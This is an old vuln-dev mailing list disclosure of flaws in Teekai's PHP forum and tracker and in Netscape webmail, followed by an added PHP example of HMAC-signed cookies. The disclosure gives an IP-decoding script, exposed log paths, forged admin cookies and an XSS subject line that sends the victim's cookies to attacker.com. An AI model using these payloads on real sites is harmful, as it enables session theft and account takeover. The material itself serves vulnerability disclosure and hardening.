List: vuln-dev
Subject: Security holes in two Teekai's products + security hole in
From: frog frog <leseulfrog () hotmail ! com>
Date: 2002-06-03 19:52:07
Hi :)
Products :
**********
Tracking Online 1.0
Teekai's forum full 1.2
http://www.teekai.info
Problems :
**********
Tracking Online & Teekai's forum :
- Information recovery
- Information decoding
Teekai's forum :
- Admin access
- small holes
Tracking Online :
- XSS
Exploits :
**********
Forum & Tracking :
- PHP file to decode information :
<?
$cryptedip = explode('.',$cryptedip);
$key = md5("20");
$trueip = $cryptedip[0]/$key.".".$cryptedip[1]/$key.".".$cryptedip[2]/
$key.".".$cryptedip[3]/$key;
echo "Result : $trueip";
?>
Forum :
- /data/member_log.txt
- Setcookie "valid_level=admin"
- Setcookie "valid_username_online=[VALUE e.g. JScript ]"
- ...
Tracking Online :
- /data/userlog/log.txt
- /userlog.php
- ...
More details in french :
http://www.ifrance.com/kitetoua/tuto/Teekai.txt
Translated by Google :
http://translate.google.com/translate?u=http%3A%2F%2Fwww.ifrance.com%
2Fkitetoua%2Ftuto%2FTeekai.txt&langpair=fr%7Cen&hl=fr&ie=ASCII&oe=ASCII
There is a security hole in the mail service that Netscape offers (
http://ncmail.netscape.com ).
It makes it possible to inject HTML in an e-mail... and this service
authenticates by cookies.
The hole consists in sending a mail whose subject is a JScript preceded
by : ";</script*> .
The idea would be a script of this kind in the subject :
";</script*><form name=a*><input name=o
value=http://www.attacker.com/script?*></form*><script*>window.open
(document.a.o.value+document.cookie)</script*>
without '*'.
I use <form> because " and ' are replaced by \" or \'.
Vendors were informed but did not repair.
Maybe more details soon...
Sorry for my poor English.
frog-m@n
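
Added example, not part of the original post and not Teekai's code: the forum issue above comes from trusting a client-set "valid_level" cookie, so this sketch puts that weak check beside a cookie whose claims are HMAC-tagged by the server. SECRET_KEY, the function names and all sample values are assumptions made for illustration.

```php
<?php
// Added example, not Teekai's code. Cookie names are from the post; SECRET_KEY
// and all function names are hypothetical. Sample values are constructed.
const SECRET_KEY = 'placeholder-load-a-random-key-from-outside-the-web-root';

// Weak pattern: the privilege level is whatever the browser sends.
function is_admin_weak(array $cookies): bool
{
    return ($cookies['valid_level'] ?? '') === 'admin';
}

// Hardened: the server tags the claims with an HMAC it alone can compute.
function issue_level_cookie(string $user, string $level, int $expires): string
{
    $payload = json_encode(['u' => $user, 'l' => $level, 'e' => $expires]);
    return base64_encode($payload) . '.' . hash_hmac('sha256', $payload, SECRET_KEY);
}

// Returns the verified claims, or null if malformed, altered or expired.
function read_level_cookie(string $cookie, int $now): ?array
{
    $parts = explode('.', $cookie, 2);
    if (count($parts) !== 2) {
        return null;
    }
    $payload = base64_decode($parts[0], true);
    if ($payload === false
        || !hash_equals(hash_hmac('sha256', $payload, SECRET_KEY), $parts[1])) {
        return null;
    }
    $claims = json_decode($payload, true);
    if (!is_array($claims) || !isset($claims['u'], $claims['l'], $claims['e'])
        || (int)$claims['e'] < $now) {
        return null;
    }
    return $claims;
}

$now = 1023133927; // constructed timestamp
var_dump(is_admin_weak(['valid_level' => 'admin'])); // client-set cookie is accepted

$cookie = issue_level_cookie('frog<script>', 'member', $now + 3600);
$claims = read_level_cookie($cookie, $now);
// Escape the name before printing it into a page (valid_username_online case).
echo htmlspecialchars($claims['u'], ENT_QUOTES, 'UTF-8'), ' => ', $claims['l'], "\n";

// Swap in an "admin" payload but keep the old tag: verification fails.
$forged = base64_encode(json_encode(['u' => 'x', 'l' => 'admin', 'e' => $now + 3600]));
var_dump(read_level_cookie($forged . '.' . explode('.', $cookie, 2)[1], $now));
```

Keeping the level in a server-side session keyed by a random session ID avoids sending the role to the client at all; the signed cookie is the smaller change for code that already reads its state from cookies.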